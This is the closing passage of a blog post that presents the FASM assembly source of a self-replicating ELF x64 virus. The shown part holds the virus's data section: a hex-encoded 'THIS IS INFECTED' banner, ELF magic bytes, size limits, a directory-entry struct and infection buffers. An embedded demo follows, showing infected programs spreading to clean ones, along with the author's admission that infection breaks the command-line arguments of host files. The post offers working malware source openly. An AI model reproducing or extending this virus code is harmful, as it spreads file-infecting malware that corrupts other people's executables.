class="mh">0x48</span><span class="p">,</span> <span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x5c</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x2f</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0x2f</span><span class="p">,</span> <span class="mh">0x7b</span><span class="p">,</span> <span class="mh">0x5e</span><span class="p">,</span> <span class="mh">0x5e</span><span class="p">,</span> <span class="mh">0x5e</span><span class="p">,</span> <span class="mh">0x7d</span><span class="p">,</span> <span class="mh">0x5c</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0x5c</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x5f</span><span class="p">,</span> <span class="mh">0x2c</span><span class="p">,</span> <span class="mh">0x2f</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0x2f</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x5e</span><span class="p">,</span> <span class="mh">0x5e</span><span class="p">,</span> <span class="mh">0x5e</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0x5c</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0x5c</span><span class="p">,</span> <span class="mh">0x2c</span><span class="p">,</span> <span class="mh">0x5f</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x28</span><span class="p">,</span> <span class="mh">0x5f</span><span class="p">,</span> <span class="mh">0x2c</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x7c</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x7c</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x2c</span><span class="p">,</span> <span class="mh">0x5f</span><span class="p">,</span> <span class="mh">0x29</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x28</span><span class="p">,</span> <span class="mh">0x5f</span><span class="p">,</span> <span class="mh">0x29</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x28</span><span class="p">,</span> <span class="mh">0x5f</span><span class="p">,</span> <span class="mh">0x29</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x21</span><span class="p">,</span> <span class="mh">0x21</span><span class="p">,</span> <span class="mh">0x21</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x54</span><span class="p">,</span> <span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0x53</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0x53</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0x4e</span><span class="p">,</span> <span class="mh">0x46</span><span class="p">,</span> <span class="mh">0x45</span><span class="p">,</span> <span class="mh">0x43</span><span class="p">,</span> <span class="mh">0x54</span><span class="p">,</span> <span class="mh">0x45</span><span class="p">,</span> <span class="mh">0x44</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x21</span><span class="p">,</span> <span class="mh">0x21</span><span class="p">,</span> <span class="mh">0x21</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x00</span>
<span class="nf">msgl</span> <span class="err">=</span> <span class="kc">$</span><span class="o">-</span><span class="nv">msg</span>
<span class="nf">elfmagic</span> <span class="nv">db</span> <span class="mh">0x7f</span><span class="p">,</span> <span class="mh">0x45</span><span class="p">,</span> <span class="mh">0x4c</span><span class="p">,</span> <span class="mh">0x46</span><span class="p">,</span> <span class="mh">0x00</span>
<span class="nf">self_size</span> <span class="err">=</span> <span class="mi">1292</span>
<span class="nf">max_size</span> <span class="err">=</span> <span class="mi">4000000</span>

<span class="nf">struc</span> <span class="nb">DI</span><span class="nv">RENT</span> <span class="err">{</span>
    <span class="nf">.d_ino</span>          <span class="nv">rq</span> <span class="mi">1</span>
    <span class="nf">.d_off</span>          <span class="nv">rq</span> <span class="mi">1</span>
    <span class="nf">.d_reclen</span>       <span class="nv">rw</span> <span class="mi">1</span>
    <span class="nf">.d_type</span>         <span class="nv">rb</span> <span class="mi">1</span>
    <span class="nf">label</span> <span class="nv">.d_name</span>   <span class="kt">byte</span>
<span class="err">}</span>
<span class="nf">virtual</span> <span class="nv">at</span> <span class="mi">0</span>
  <span class="nf">DIRENT</span> <span class="nb">DI</span><span class="nv">RENT</span>
  <span class="nf">sizeof.DIRENT</span> <span class="err">=</span> <span class="kc">$</span> <span class="o">-</span> <span class="nb">DI</span><span class="nv">RENT</span>
<span class="nf">end</span> <span class="nv">virtual</span>

<span class="nf">infected</span> <span class="nv">rb</span> <span class="nv">max_size</span>
<span class="nf">host</span> <span class="nv">rb</span> <span class="nv">max_size</span>
<span class="nf">self</span> <span class="nv">rb</span> <span class="nv">self_size</span>
</code></pre></div></div>

<p><strong>DEMO</strong>   <br />
Here is the demo showing programs being infected by the virus and then these infected programs spreading 
its infection to other clean programs</p>

<script async="" id="asciicast-529026" src="https://asciinema.org/a/529026.js"></script>

<p><em><strong>NOTE:</strong> Although i mentioned that the virus is harmless but during testing i found out that it has bug that 
it disables commandline arguments of infected files, which is obviously never will be fixed, thanks to my laziness!</em></p>

  </div><a class="u-url" href="/2022/10/16/elf-x64-virus-fasm.html" hidden></a>
</article>

      </div>
    </main>
</body>

</html>
